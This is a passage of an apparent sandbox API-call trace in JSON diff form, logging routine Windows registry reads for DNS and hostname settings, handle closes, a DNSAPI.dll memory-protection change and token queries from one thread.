], + "repeated": 0, + "id": 572 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 573 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" + } + ], + "repeated": 0, + "id": 574 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 575 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\Windows NT\\DnsClient" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient" + } + ], + "repeated": 0, + "id": 576 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 577 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00000001", + "pretty_value": "KEY_QUERY_VALUE" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\System\\DNSClient" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\System\\DNSClient" + } + ], + "repeated": 0, + "id": 578 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "Domain" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain" + } + ], + "repeated": 0, + "id": 579 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "Domain" + }, + { + "name": "Type", + "value": "1", + "pretty_value": "REG_SZ" + }, + { + "name": "Information", + "value": "" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain" + } + ], + "repeated": 0, + "id": 580 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ae44b", + "parentcaller": "0x7363b206", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000420" + } + ], + "repeated": 0, + "id": 581 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ae44b", + "parentcaller": "0x7363b215", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000041c" + } + ], + "repeated": 0, + "id": 582 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 583 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "System\\CurrentControlSet\\Services\\Tcpip\\Parameters" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" + }, + { + "name": "Class", + "value": "Class" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 584 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 585 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" + } + ], + "repeated": 0, + "id": 586 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 587 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\Windows NT\\DnsClient" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient" + } + ], + "repeated": 0, + "id": 588 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "Hostname" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" + } + ], + "repeated": 0, + "id": 589 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "Hostname" + }, + { + "name": "Type", + "value": "1", + "pretty_value": "REG_SZ" + }, + { + "name": "Information", + "value": "DESKTOP-JNJQ8PL" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" + } + ], + "repeated": 0, + "id": 590 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ae44b", + "parentcaller": "0x7363b206", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000041c" + } + ], + "repeated": 0, + "id": 591 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ae44b", + "parentcaller": "0x7363b215", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000420" + } + ], + "repeated": 0, + "id": 592 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x76041941", + "parentcaller": "0x738c7123", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x00120007" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\xf72\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\xf72\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x08\\xf72\\x05#q\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 593 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756b8b4a", + "parentcaller": "0x76041966", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000420" + } + ], + "repeated": 0, + "id": 594 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73691000" + }, + { + "name": "ModuleName", + "value": "DNSAPI.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 595 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73691000" + }, + { + "name": "ModuleName", + "value": "DNSAPI.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 596 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77057a99", + "parentcaller": "0x75122407", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 597 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x75121428", + "parentcaller": "0x7511e9c2", + "category": "filesystem", + "api": "NtOpenDirectoryObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "DirectoryHandle", + "value": "0x00000420" + }, + { + "name": "DesiredAccess", + "value": "0x00020001", + "pretty_value": "FILE_READ_ACCESS|READ_CONTROL" + }, + { + "name": "ObjectAttributes", + "value": "C:\\RPC Control" + } + ], + "repeated": 0, + "id": 598 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ba174", + "parentcaller": "0x751214b9", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x0000041c" + } + ], + "repeated": 0, + "id": 599 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77046a50", + "parentcaller": "0x77049486", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "10" + }, + { + "name": "TokenInformation", + "value": "g\\x95\\x1d\\x00\\x00\\x00\\x00\\x00\\xcd7\\x03\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\xa8\\x95\\x1d\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 600 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770490f4", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "4" + }, + { + "name": "TokenInformation", + "value": "\\xbc\\xffO\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\\\x00S\\x00y\\x00s\\x00t\\x00e\\x00m\\x003\\x002\\x00\\\\x00r\\x00a\\x00s\\x00a\\x00d\\x00h\\x00l\\x00p\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 601 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77049133", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "25" + }, + { + "name": "TokenInformation", + "value": "0uQ\\x00`\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 602 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77049150", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": false, + "return": "0xffffffffc0000023", + "pretty_return": "BUFFER_TOO_SMALL", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "5" + }, + { + "name": "TokenInformation", + "value": "" + } + ], + "repeated": 0, + "id": 603 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7704918f", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "5" + }, + { + "name": "TokenInformation", + "value": "\\xf48Q\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\x01\\x02\\x00\\x00" + } + ], + "repeated": 0, + "id": 604 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770491a8", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": false, + "return": "0xffffffffc0000023", + "pretty_return": "BUFFER_TOO_SMALL", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "6" + }, + { + "name": "TokenInformation", + "value": "" + } + ], + "repeated": 0, + "id": 605 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770491e3", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "6" + }, + { + "name": "TokenInformation", + "value": "\\xa4rR\\x00\\x02\\x00P\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x10\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x10\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x12\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\xa0\\x01\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00'7\\x03\\x00" + } + ], + "repeated": 0, + "id": 606 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77049270", + "parentcaller": "0x770491f3", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "41" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc6\\x9a%s\\x04\\xb6%s\\x06\\x00\\x00\\x00\\xf0\\xb5%sT\\x00\\x00\\x00\\xa0rR\\x00\\x00\\x00#\\x004\\xf1(\\xf1\\x1c\\x04\\x00\\x00d\\x01\\x00\\x00\\x00\\x00I\\x00#\\x00\\x00\\xc0\\x1c\\x04\\x00\\x00|\\xf12\\x05\\xe3\\x91\\x04w\\x1c\\x04\\x00\\x00" + } + ], + "repeated": 0, + "id": 607 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7704929e", + "parentcaller": "0x770491f3", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "41" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00\\x8c\\xf8\\x83\\x02\\xd8\\x8f'sd\\x01~\\x02#\\x00\\x00\\xc0\\x04\\xa0\\x04s\\xa3 \\xbf\\xfa$\\xec2\\x05\\x1c\\x04\\x00\\x00t\\xf62\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff4\\xf12\\x05v\\xb6\\x07s\\x1c\\x00\\x00\\x00\\xbc\\x9a%s \\xb6%s" + } + ], + "repeated": 0, + "id": 608 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77046a50", + "parentcaller": "0x77047181", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "10" + }, + { + "name": "TokenInformation", + "value": "g\\x95\\x1d\\x00\\x00\\x00\\x00\\x00\\xcd7\\x03\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\xa8\\x95\\x1d\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 609 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770490f4", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "4" + }, + { + "name": "TokenInformation", + "value": "|\\x08P\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 610 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77049133", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "25" + }, + { + "name": "TokenInformation", + "value": "\\xd0sQ\\x00`\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x08UG\\xec\\xe9\\x8f\\xdb\\x01\\x02\\x00\\x00\\x00\\x05\\x00\\x00\\x00\n\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x002\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 611 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77049150", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": false, + "return": "0xffffffffc0000023", + "pretty_return": "BUFFER_TOO_SMALL", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "5" + }, + { + "name": "TokenInformation", + "value": "" + } + ], + "repeated": 0, + "id": 612 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7704918f", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "5" + }, + { + "name": "TokenInformation", + "value": "\\xdc7Q\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\x01\\x02\\x00\\x00" + } + ], + "repeated": 0, + "id": 613 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770491a8", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": false, + "return": "0xffffffffc0000023", + "pretty_return": "BUFFER_TOO_SMALL", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "6" + }, + { + "name": "TokenInformation", + "value": "" + } + ], + "repeated": 0, + "id": 614 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770491e3", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "6" + }, + { + "name": "TokenInformation", + "value": "\\x04\\xf9Q\\x00\\x02\\x00P\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x10\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x10\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x12\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\xa0\\x01\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00'7\\x03\\x00" + } + ], + "repeated": 0, + "id": 615 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77049270", + "parentcaller": "0x770491f3", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "41" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc6\\x9a%s\\x04\\xb6%s\\x06\\x00\\x00\\x00\\xf0\\xb5%sT\\x00\\x00\\x00\\x00\\xf9Q\\x00\\x00\\x00#\\x00\\x1c\\xef\\x10\\xef\\x1c\\x04\\x00\\x00d\\x01\\x00\\x00\\x00\\x00I\\x00#\\x00\\x00\\xc0\\x1c\\x04\\x00\\x00d\\xef2\\x05\\xe3\\x91\\x04w\\x1c\\x04\\x00\\x00" + } + ], + "repeated": 0, + "id": 616 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7704929e", + "parentcaller": "0x770491f3", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "41" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00\\x8c\\xf8\\x83\\x02\\xd8\\x8f'sd\\x01~\\x02#\\x00\\x00\\xc0\\x04\\xa0\\x04s\\x8b>\\xbf\\xfa\\x0c\\xea2\\x05\\x1c\\x04\\x00\\x00t\\xf62\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\x1c\\xef2\\x05v\\xb6\\x07s\\x1c\\x00\\x00\\x00\\xbc\\x9a%s \\xb6%s" + } + ], + "repeated": 0, + "id": 617 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756b8b4a", + "parentcaller": "0x75121509", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000420" + } + ], + "repeated": 0, + "id": 618 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756b8b4a", + "parentcaller": "0x75121522", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000041c" + } + ], + "repeated": 0, + "id": 619 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77057a99", + "parentcaller": "0x75122407", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 620 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x75121428", + 